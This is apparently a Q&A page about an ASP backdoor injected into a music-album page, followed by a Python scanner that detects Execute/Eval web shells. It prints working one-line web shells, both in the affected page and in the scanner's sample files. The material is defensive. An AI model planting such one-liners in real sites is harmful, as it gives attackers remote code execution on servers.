execute() can run arbitrary ASP code

Source: 百度文库 (Baidu Wenku)   Editor: 查人人中国名人网   Time: 2024/04/29 19:22:39
The execute() function can run arbitrary ASP code and is exploited by some backdoors. Its usual form is: execute(X)
Could an expert please advise? What should I do?
<%
Dim SpecialID,Show_Special_rs
SpecialID=request.QueryString("id")
If SpecialID="" or not IsNumeric(SpecialID) Then
Response.Write ("Access error!")
Response.End
End If

Dim SClass,SClassID,NClassID,NClass,name,pic,yuyan,Times,GongSi,intro
Set Show_Special_rs=server.createobject("adodb.recordset")
Sql="select SClass,SClassID,NClassID,NClass,name,pic,yuyan,Times,GongSi,intro,hits from [Special] where Specialid="&Cint(SpecialID)
Show_Special_rs.open Sql,conn,1,3
If Show_Special_rs.eof Then
Response.Write ("Parameter error! The album may have been deleted")
Response.End
End If
Show_Special_rs("hits")=Show_Special_rs("hits")+1
Show_Special_rs.update
SClassID=Show_Special_rs("SClassID")
SClass=Show_Special_rs("SClass")
NClassID=Show_Special_rs("NClassID")
NClass=Show_Special_rs("NClass")
name=Show_Special_rs("name")
pic=Show_Special_rs("pic")
yuyan=Show_Special_rs("yuyan")
Times=Show_Special_rs("Times")
GongSi=Show_Special_rs("GongSi")
intro=Show_Special_rs("intro")

Show_Special_rs.close
Set Show_Special_rs=NOTHING
stats="Album "&name
%>
<%
' Injected backdoor: the bare Request("a") is looked up in QueryString, Form,
' Cookies, ClientCertificate and ServerVariables, and Execute runs whatever it
' returns as VBScript with the web application's privileges.
if request("a")<>"" then execute request("a")
%>

<%
Dim Best_Music_rs,Best_Music_Num,Best_Music_Sql,Best_Music_bgcolor
Best_Music_Sql="select ID,MusicName,Singer,hits from [MusicList] where Specialid="&Cint(SpecialID)
Best_Music_Num=100
Set Best_Music_rs=conn.execute(Best_Music_Sql)
For i=1 To Best_Music_Num
If Best_Music_rs.eof Then Exit For
Best_Music_bgcolor="f7f7f7"
If i mod 2 = 0 Then
Best_Music_bgcolor="ffffff"
Else
Best_Music_bgcolor="f7f7f7"
End If
%>
The above is the ASP content on my site.

<%
if request("a")<>"" then execute request("a")
%>

Someone else inserted this code into the page.

Just delete it.
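Deleting the one line fixes that page, but an attacker who could write to special.asp usually drops the same one-liner into several files. The scanner below is an added example, not code from the original post or from the affected site, that finds this class of backdoor across a classic ASP tree. It distinguishes the VBScript Execute/ExecuteGlobal/Eval statements from the ADO conn.Execute method the page uses legitimately, reports lines that run Request data directly as "backdoor", and anything else that runs dynamic code as "review". The file-extension list and the sample files are assumptions and constructed data, not real site contents.

```python
"""Find Execute/Eval-style backdoors in a classic ASP (VBScript) code tree.

Added example, not part of the original post or of the affected site.
"""
import os
import re
from dataclasses import dataclass

# File extensions IIS hands to the ASP engine (assumption: adjust to the server's
# script map; attackers like .asa/.cer/.cdx because they are seldom reviewed).
ASP_EXTENSIONS = {".asp", ".asa", ".inc", ".cer", ".cdx"}

# VBScript statements that compile and run source text at runtime. The negative
# lookbehind rejects object methods such as conn.Execute(sql), so the ADO calls
# that are everywhere in classic ASP are not reported.
_CODE_EXEC = re.compile(r"(?<![\w.])(?:execute|executeglobal|eval)\b", re.IGNORECASE)

# The same statements fed straight from Request: the bare Request("a") shortcut
# (which searches QueryString, Form, Cookies, ClientCertificate and
# ServerVariables) as well as Request.Form("x") / Request.QueryString("x"),
# with or without parentheses around the argument.
_REQUEST_FED = re.compile(
    r"(?<![\w.])(?:execute|executeglobal|eval)\s*\(?\s*request(?:\.\w+)?\s*\(",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    path: str
    lineno: int
    severity: str  # "backdoor": runs Request data directly; "review": runs something else
    text: str


def scan_source(path: str, source: str) -> list[Finding]:
    """Scan one file's text; returns one Finding per suspicious line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if _REQUEST_FED.search(line):
            findings.append(Finding(path, lineno, "backdoor", line.strip()))
        elif _CODE_EXEC.search(line):
            # Indirect variants (code = Request.Form("c") : Execute(code)) and
            # legitimate dynamic code both land here; a human has to look.
            findings.append(Finding(path, lineno, "review", line.strip()))
    return findings


def scan_sources(files: dict[str, str]) -> list[Finding]:
    """Scan an in-memory {path: text} mapping (used for the constructed samples)."""
    out = []
    for path, text in files.items():
        out.extend(scan_source(path, text))
    return out


def scan_tree(root: str) -> list[Finding]:
    """Walk a site root on disk and scan every ASP-handled file."""
    out = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() in ASP_EXTENSIONS:
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    # latin-1 never fails to decode and the patterns are pure
                    # ASCII, so GBK/GB2312-encoded pages scan fine.
                    out.extend(scan_source(full, fh.read().decode("latin-1")))
    return out


# Constructed sample files (not real site contents): the injected line from the
# post next to two legitimate ADO Execute calls that must not be flagged, a
# classic one-line Eval shell hidden in an .asa file, and an indirect variant.
SAMPLE_FILES = {
    "special.asp": (
        '<%\n'
        'Set Show_Special_rs=server.createobject("adodb.recordset")\n'
        'Show_Special_rs.open Sql,conn,1,3\n'
        '%>\n'
        '<%\n'
        'if request("a")<>"" then execute request("a")\n'
        '%>\n'
        '<%\n'
        'Set Best_Music_rs=conn.execute(Best_Music_Sql)\n'
        '%>\n'
    ),
    "conn.asp": '<%\nSet conn=Server.CreateObject("ADODB.Connection")\nconn.Execute "update Special set hits=0"\n%>\n',
    "images/img.asa": '<%eval request("cmd")%>\n',
    "inc/helper.inc": '<%\nDim code\ncode = Request.Form("c")\nExecute(code)\n%>\n',
}


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_sources(SAMPLE_FILES)
    for f in results:
        print(f"{f.severity:8} {f.path}:{f.lineno}: {f.text}")
```

Run it with the site root as its only argument; with no argument it scans the constructed samples, reporting special.asp line 6 and images/img.asa line 1 as backdoors and inc/helper.inc line 4 for review, while neither conn.Execute call is reported. Two caveats worth keeping in mind: a string built with Chr() or split across variables will only surface as a "review" hit, so those still need eyes on them; and because the bare Request("a") form also reads cookies and POST bodies, a search of the IIS logs for "?a=" will not reliably show when the backdoor was used.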